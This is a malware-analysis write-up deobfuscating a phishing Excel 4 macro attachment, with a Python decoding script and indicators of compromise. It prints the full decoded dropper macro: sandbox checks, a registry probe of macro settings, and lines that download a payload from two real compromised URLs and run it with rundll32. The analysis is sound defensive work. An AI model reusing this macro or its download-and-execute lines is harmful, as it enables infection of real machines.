Reverse Engineering Obfuscated Excel 4 Macro Malware

An employee at First Look Media reported a phishing email to the security team that had a malicious attachment called form_199025.xls. The day the email was received, only one out of 56 anti-virus programs at VirusTotal detected it as a threat. I decided to dig into this attachment and discover what the malware does.

Screenshot of phishing email

To look at the document itself without risking the malware infecting my computer, I converted it to a safe PDF using Dangerzone, an open source tool recently released by First Look Media that lets you open potentially malicious documents without getting hacked.

Screenshot of safe PDF generated by Dangerzone

The bait in this case is a green Microsoft Excel-themed image, disguised to look like part of Excel’s user interface, trying to entice the user to click the “Enable Editing” and “Enable Content” buttons. If the user opens the document in Excel and clicks these, it tells Excel to run the macros embedded in the document, which would then likely hack the computer.

Next, we submitted the sample document to various online malware scanners including one called IRIS-H Digital Forensics, which specializes in static analysis of document formats (see report here). Excel spreadsheets can have multiple “sheets”, and the IRIS-H analysis discovered that the .xls file contains a visible sheet called “Sheet1” (this contains the green bait image) and a hidden macro sheet called “rZVUfQRQoV”.

Screenshot from IRIS-H of the top of the hidden macro sheet

The first 78 rows and 34 columns of the macro sheet contain either numbers or the string “GVK”. Beneath that, starting on row 81, you can see Excel 4 macro functions being called, but what they do is clearly obfuscated.

Screenshot of obfuscated macro code

Functions like FORMULA, CHAR, and APP.MAXIMIZE are Excel 4 macro functions. They were included in Excel 4, but when Excel 5 came out (in 1993!) this type of macro was replaced with VBA. Still, in 2020, Microsoft Excel supports Excel 4 macros for backwards compatibility reasons. And recently, phishers have been using this old-school type of macro for malware. This is what we’ve come across.

So, what does it do? Here is the first macro that gets executed:

FORMULA(2178/GET.CELL(17,H80)+GET.CELL(19,H80)*DAY(NOW())-10,W86)

To figure out how this works, I found this Excel 4.0 Macro Functions Reference (pdf) and learned that:

  • The FORMULA function takes two arguments, formula_text and reference. It takes the value in formula_text and places it in the spreadsheet at the location defined by reference.
  • The GET.CELL function takes two arguments, type_num and reference. It looks at the cell defined in reference and returns a value based on what type_num is. If type_num is 17, the value is “row height of cell, in points”, and if type_num is 19, the value is “size of font, in points”.
  • The NOW function returns today’s timestamp, and the DAY function takes a timestamp as an argument and returns the day of the month from it.

In other words, this macro says: “Store the following in cell W86: 2178 divided by the height of cell H80, plus the font size of cell H80 times the day of the month, minus ten.”

By loading the document in LibreOffice in a virtual machine and unhiding the macro sheet, I determined that cell H80 has a height of 24.95 points and a font size of 10 points. It’s also interesting to note that the value stored in W86 changes depending on the day of the month. The email was sent on April 17, so the malware only deobfuscates correctly when the day of the month is 17, as it was on the date the email was sent.

So doing the math, W86 should have the value 2178 divided by 24.95 plus 10 times 17 minus 10, which equals 247.29458917835672.
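The same arithmetic can be sketched in Python. This is only an illustration of the first macro's formula: the function name offset_key is made up for this example, and the inputs are the row height and font size measured above.

```python
from datetime import date

def offset_key(row_height, font_size, day_of_month):
    # Mirrors 2178/GET.CELL(17,H80)+GET.CELL(19,H80)*DAY(NOW())-10
    return 2178 / row_height + font_size * day_of_month - 10

# Values measured for cell H80, and the day the email was sent (April 17)
key = offset_key(24.95, 10, date(2020, 4, 17).day)
print(key)

# One day later the key grows by the font size, so every decoded
# character would land 10 code points too low
print(offset_key(24.95, 10, 18) - key)
```

Because the day of the month is multiplied by the font size, opening the document on any other day produces a different key and the later strings decode to garbage.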

The next macro that gets executed is:

APP.MAXIMIZE()

This just maximizes the Excel window. Then:

FORMULA(CHAR(A1-W86)&CHAR(A2-W86)&CHAR(A3-W86)&CHAR(A5-W86)&CHAR(A6-W86)&CHAR(A7-W86)&CHAR(A8-W86)&CHAR(A9-W86)&CHAR(A11-W86)&CHAR(A12-W86)&CHAR(A13-W86)&CHAR(A14-W86)&CHAR(A16-W86)&CHAR(A17-W86)&CHAR(A18-W86)&CHAR(A19-W86)&CHAR(A20-W86)&CHAR(A22-W86)&CHAR(A23-W86)&CHAR(A24-W86)&CHAR(A25-W86)&CHAR(A27-W86)&CHAR(A28-W86)&CHAR(A29-W86)&CHAR(A30-W86)&CHAR(A32-W86)&CHAR(A33-W86)&CHAR(A34-W86)&CHAR(A35-W86)&CHAR(A36-W86)&CHAR(A38-W86)&CHAR(A39-W86)&CHAR(A40-W86)&CHAR(A41-W86)&CHAR(A42-W86)&CHAR(A44-W86)&CHAR(A45-W86)&CHAR(A46-W86)&CHAR(A47-W86)&CHAR(A48-W86),B134)

The CHAR function converts a number into a character, using the ASCII character set. For example, CHAR(65) would return “A” and CHAR(33) would return “!”. In Excel 4 macros, the “&” character concatenates strings together.

So this macro builds a string, one character at a time, and stores it in cell B134. The first character is CHAR(A1-W86), the second character is CHAR(A2-W86), and so on. CHAR(A1-W86) means take the value in cell A1 (which is 308.12), subtract the value in cell W86 (which gets set in the first macro), and then convert that into a character.

The rest of the macros are similar. They build up a string and store it in a cell in the B column:

FORMULA(CHAR(B1-W86)&CHAR(B2-W86)&CHAR(B3-W86)&CHAR(B5-W86)&CHAR(B6-W86)&CHAR(B7-W86)&CHAR(B8-W86)&CHAR(B9-W86)&CHAR(B11-W86)&CHAR(B12-W86)&CHAR(B13-W86)&CHAR(B14-W86)&CHAR(B16-W86)&CHAR(B17-W86)&CHAR(B18-W86)&CHAR(B19-W86)&CHAR(B20-W86)&CHAR(B22-W86)&CHAR(B23-W86)&CHAR(B24-W86)&CHAR(B25-W86)&CHAR(B27-W86)&CHAR(B28-W86)&CHAR(B29-W86)&CHAR(B30-W86)&CHAR(B32-W86)&CHAR(B33-W86)&CHAR(B34-W86)&CHAR(B35-W86)&CHAR(B36-W86)&CHAR(B38-W86)&CHAR(B39-W86)&CHAR(B40-W86)&CHAR(B41-W86)&CHAR(B42-W86)&CHAR(B44-W86)&CHAR(B45-W86)&CHAR(B46-W86)&CHAR(B47-W86)&CHAR(B48-W86),B135)
FORMULA(CHAR(D1-W86)&CHAR(D2-W86)&CHAR(D3-W86)&CHAR(D5-W86)&CHAR(D6-W86)&CHAR(D7-W86)&CHAR(D8-W86)&CHAR(D9-W86)&CHAR(D11-W86)&CHAR(D12-W86)&CHAR(D13-W86)&CHAR(D14-W86)&CHAR(D16-W86)&CHAR(D17-W86)&CHAR(D18-W86)&CHAR(D19-W86)&CHAR(D20-W86)&CHAR(D22-W86)&CHAR(D23-W86)&CHAR(D24-W86)&CHAR(D25-W86)&CHAR(D27-W86)&CHAR(D28-W86)&CHAR(D29-W86)&CHAR(D30-W86)&CHAR(D32-W86)&CHAR(D33-W86)&CHAR(D34-W86)&CHAR(D35-W86)&CHAR(D36-W86)&CHAR(D38-W86)&CHAR(D39-W86)&CHAR(D40-W86)&CHAR(D41-W86)&CHAR(D42-W86),B136)
… and so on

Each character is always defined by a value in the hidden macro sheet minus the value in cell W86. So, each character is offset by the same amount, the value in W86. Also, if the number passed into CHAR isn’t an integer (say it’s 65.45), it gets truncated to an integer by chopping off the decimal part (to 65) before being converted into a character.
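Here is a minimal sketch of that offset-and-truncate scheme in Python. The decode_cell function follows the description above. The encode_char function and its noise parameter are hypothetical and only show how such cell values could be generated; they are not taken from the malware.

```python
KEY = 247.29458917835672  # value of W86 computed by the first macro

def decode_cell(cell_value, key=KEY):
    # CHAR(cell - W86): subtract the key, drop the fraction, look up the character
    return chr(int(cell_value - key))

def encode_char(ch, key=KEY, noise=0.5):
    # Hypothetical inverse: any noise in [0, 1) is removed by truncation
    return ord(ch) + key + noise

cells = [encode_char(c) for c in "=IF("]
# "&" in the macro corresponds to joining the decoded characters
decoded = "".join(decode_cell(value) for value in cells)
print(cells)
print(decoded)
```

The truncation is what lets the sheet store non-integer numbers: the fractional part carries no information and just makes the values look less like character codes.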

To deobfuscate the malware, I saved the macro sheet as a comma-separated value (CSV) file, and then I wrote a script in Python.

My script first loaded the first 80 rows of the CSV and stored them in a dictionary called data, where the key is the cell reference. So data["A1"] is 308.12, data["B1"] is 320.12, etc. Then it set data["W86"] to 247.29458917835672, which was the result of that first macro.
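The loading step could look roughly like the sketch below. It is not the original script: the names load_cells and column_letters are invented here, and skipping non-numeric cells (such as the “GVK” filler) is an assumption about how those cells should be handled.

```python
import csv
import io

def column_letters(index):
    """Convert a zero-based column index to letters: 0 -> A, 25 -> Z, 26 -> AA."""
    letters = ""
    index += 1
    while index > 0:
        index, remainder = divmod(index - 1, 26)
        letters = chr(ord("A") + remainder) + letters
    return letters

def load_cells(csv_file, max_rows=80):
    """Return a dict such as {"A1": 308.12, ...} from the first max_rows rows."""
    data = {}
    for row_number, row in enumerate(csv.reader(csv_file), start=1):
        if row_number > max_rows:
            break
        for col_index, value in enumerate(row):
            try:
                data[f"{column_letters(col_index)}{row_number}"] = float(value)
            except ValueError:
                continue  # skip blanks and filler strings such as "GVK"
    return data

# Tiny in-memory stand-in for the exported sheet; the second row is made up
sample = io.StringIO("308.12,320.12,GVK\n1.5,,2.5\n")
data = load_cells(sample)
data["W86"] = 247.29458917835672  # result of the first macro
print(data)
```

With the real export, the io.StringIO object would be replaced by a file opened with open(path, newline="").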

Here is the function that does most of the magic:

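def deobfuscate_formula(data, formula_text, reference):
    """Decode a chain of CHAR(x-y)&CHAR(x-y)... terms and store the result."""
    text = ""
    # Each term looks like CHAR(A1-W86); "&" joins the terms together
    for term in formula_text.split("&"):
        # Strip the leading "CHAR(" and the trailing ")" to get "A1-W86"
        ref1, ref2 = term[5:-1].split("-")
        # int() drops the fractional part, the same way CHAR does
        text += chr(int(data[ref1] - data[ref2]))
    data[reference] = text
    print(text)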

As arguments it takes in the data dictionary, the formula text, and the reference cell to store the value in. So if formula_text were CHAR(Q1-W86)&CHAR(Q2-W86), and reference were B146, this would figure out what those two characters were, store them in cell B146, and then also print them to the terminal.

Then I tried to decode the first obfuscated string by running this:

deobfuscate_formula(
   data,
   "CHAR(A1-W86)&CHAR(A2-W86)&CHAR(A3-W86)&CHAR(A5-W86)&CHAR(A6-W86)&CHAR(A7-W86)&CHAR(A8-W86)&CHAR(A9-W86)&CHAR(A11-W86)&CHAR(A12-W86)&CHAR(A13-W86)&CHAR(A14-W86)&CHAR(A16-W86)&CHAR(A17-W86)&CHAR(A18-W86)&CHAR(A19-W86)&CHAR(A20-W86)&CHAR(A22-W86)&CHAR(A23-W86)&CHAR(A24-W86)&CHAR(A25-W86)&CHAR(A27-W86)&CHAR(A28-W86)&CHAR(A29-W86)&CHAR(A30-W86)&CHAR(A32-W86)&CHAR(A33-W86)&CHAR(A34-W86)&CHAR(A35-W86)&CHAR(A36-W86)&CHAR(A38-W86)&CHAR(A39-W86)&CHAR(A40-W86)&CHAR(A41-W86)&CHAR(A42-W86)&CHAR(A44-W86)&CHAR(A45-W86)&CHAR(A46-W86)&CHAR(A47-W86)&CHAR(A48-W86)",
   "B134",
)

This is the value that the macro puts in cell B134:

=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
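Rather than pasting each formula in by hand, the FORMULA(...) lines from the macro sheet could be split into their two arguments programmatically. The helper below is a hypothetical sketch, not part of the original script. It relies on the reference always being the last comma-separated argument, which holds for the macros shown here.

```python
def split_formula_call(line):
    """Split 'FORMULA(<formula_text>,<reference>)' into its two arguments."""
    line = line.strip()
    if line.startswith("="):
        line = line[1:]
    if not (line.startswith("FORMULA(") and line.endswith(")")):
        raise ValueError(f"not a FORMULA call: {line!r}")
    inner = line[len("FORMULA("):-1]
    # The reference is whatever follows the last comma
    formula_text, reference = inner.rsplit(",", 1)
    return formula_text, reference.strip()

formula_text, reference = split_formula_call(
    "FORMULA(CHAR(A1-W86)&CHAR(A2-W86),B134)"
)
print(formula_text, reference)
```

Each resulting pair can then be handed to deobfuscate_formula together with the data dictionary.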

Adding the remaining FORMULA functions from the hidden macro sheet to my script reveals the complete deobfuscated code:

=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
="C:\Users\Public\"&RANDBETWEEN(1,9999)&".reg"
="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&R[-1]C&" /y"
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R[-1]C,0,5)
=WAIT(NOW()+"00:00:03")
=FOPEN(R[-4]C)
=FPOS(R[-1]C,215)
=FREAD(R[-2]C,255)
=FCLOSE(R[-3]C)
=FILE.DELETE(R[-8]C)
=IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
="C:\Users\Public\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr"
="http://rksinha.com/wp-content/themes/calliope/wp-front.php"
="http://salamdrug.com/wp-content/themes/calliope/wp-front.php"
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-3]C,0,0)
=ERROR(FALSE)
=FOPEN(R[-5]C,2)
=IF(ISERROR(R[-1]C),,GOTO(R[2]C))
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-5]C,R[-7]C,0,0)
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",R[-9]C&",DllRegisterServer",0,5)
=CLOSE(FALSE)

The last macro in the hidden macro sheet was GOTO(B134), which is the cell that the deobfuscated code started getting written to. In other words, the macros you can see in the hidden macro sheet wrote out all of the above macros into cells, and then executed them.
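The deobfuscated macros refer to each other with references like R[-1]C. This is Excel's R1C1 relative notation: R[-1]C means “one row up, same column”. When following the code by hand, it helps to resolve these into ordinary cell names. The sketch below does that. The function names are made up for this example, the cell addresses used are only illustrative, and it handles only the relative forms that appear above.

```python
import re

_R1C1 = re.compile(r"^R(?:\[(-?\d+)\])?C(?:\[(-?\d+)\])?$")
_A1 = re.compile(r"^([A-Z]+)(\d+)$")

def col_to_number(letters):
    number = 0
    for ch in letters:
        number = number * 26 + ord(ch) - ord("A") + 1
    return number

def number_to_col(number):
    letters = ""
    while number > 0:
        number, remainder = divmod(number - 1, 26)
        letters = chr(ord("A") + remainder) + letters
    return letters

def resolve_relative(ref, current_cell):
    """Resolve a relative reference such as R[-1]C against a cell such as B139."""
    offsets = _R1C1.match(ref)
    here = _A1.match(current_cell)
    if not offsets or not here:
        raise ValueError(f"cannot resolve {ref!r} from {current_cell!r}")
    row = int(here.group(2)) + int(offsets.group(1) or 0)
    col = col_to_number(here.group(1)) + int(offsets.group(2) or 0)
    return f"{number_to_col(col)}{row}"

print(resolve_relative("R[-1]C", "B139"))
print(resolve_relative("R[2]C", "B150"))
```

Read this way, a line such as FOPEN(R[-4]C) opens the file whose path was built four rows earlier in the same column.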

Here is a rough breakdown of what these malicious macros do (this write-up about similar but less obfuscated malware was helpful in understanding the Windows registry bits):

  • Checks that it is running in Excel on Windows, and quits if not
  • Exports the Excel security key from the Windows registry to a file, reads part of it, and quits if it finds “0001” there, which appears to indicate that the “enable all macros” setting is already on
  • Tries to download an executable file from one of two URLs, both of which appear to be hacked WordPress sites (the URLhaus database lists these URLs under the “zloader” tag)
  • Pops up a warning that says, “The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt” (it’s not corrupt, this is subterfuge)
  • Executes the malicious file that was downloaded, and quits
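The first four deobfuscated lines are all checks that close the workbook early. As a rough model, they can be written as a single Python function. The meanings given to the GET.WORKSPACE type numbers (13 and 14 as usable workspace width and height in points, 42 as sound capability, 1 as the environment name) are my reading of the macro reference and should be treated as assumptions, as should the function and parameter names.

```python
def macro_would_continue(width_pts, height_pts, can_play_sound, environment):
    """Model of the early-exit checks; returns False where the macro calls CLOSE."""
    if width_pts < 770:        # =IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
        return False
    if height_pts < 390:       # =IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
        return False
    if not can_play_sound:     # =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
        return False
    # =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
    # SEARCH is case-insensitive, so compare in lower case
    if "windows" not in environment.lower():
        return False
    return True

# Hypothetical environments for illustration
print(macro_would_continue(1024, 600, True, "Windows (32-bit) NT 10.00"))
print(macro_would_continue(640, 480, True, "Windows (32-bit) NT 10.00"))
```

Checks like a small window or missing audio would be typical of an automated analysis environment, which may be why the macro bails out in those cases.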

By the time I did this analysis, the malware was gone from both apparently-hacked WordPress sites, so I don’t have any way to know what it was supposed to do beyond that. It could have been a remote access tool allowing the attacker to access the computer at a later point, or it could have been ransomware, or any number of other payloads. (Also, the obfuscated code only successfully decodes if you’re running this on the 17th of the month.)

We found a similar .xls malware sample uploaded to another malware analysis site, Joe Sandbox, which ran the malware in a Windows sandbox and provided lots of details, including screenshots.

Screenshot from Joe Sandbox of a similar malicious Excel document, with the macros getting executed

Indicators of Compromise

Malicious document:

  • Filename: form_199025.xls
  • SHA256 checksum: 5ce02347e90776f6a3e3142e9e01b1570c8234e702ac796104a08e5c3bb68cf9

Malware URLs:

  • http://rksinha[.]com/wp-content/themes/calliope/wp-front.php
  • http://salamdrug[.]com/wp-content/themes/calliope/wp-front.php
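To check whether a file you have matches the malicious document listed above, you can compare SHA256 checksums. This is a minimal sketch using Python's standard hashlib module. The function names are made up for this example, and the file should only be handled in an isolated environment.

```python
import hashlib

KNOWN_SHA256 = "5ce02347e90776f6a3e3142e9e01b1570c8234e702ac796104a08e5c3bb68cf9"

def sha256_of_file(path, chunk_size=65536):
    """Hash a file in chunks so large files don't need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def matches_known_sample(path):
    # True only if the file is byte-for-byte identical to the listed sample
    return sha256_of_file(path) == KNOWN_SHA256
```

A match confirms the exact same file. A mismatch says little, since attackers routinely send slightly different documents to different targets.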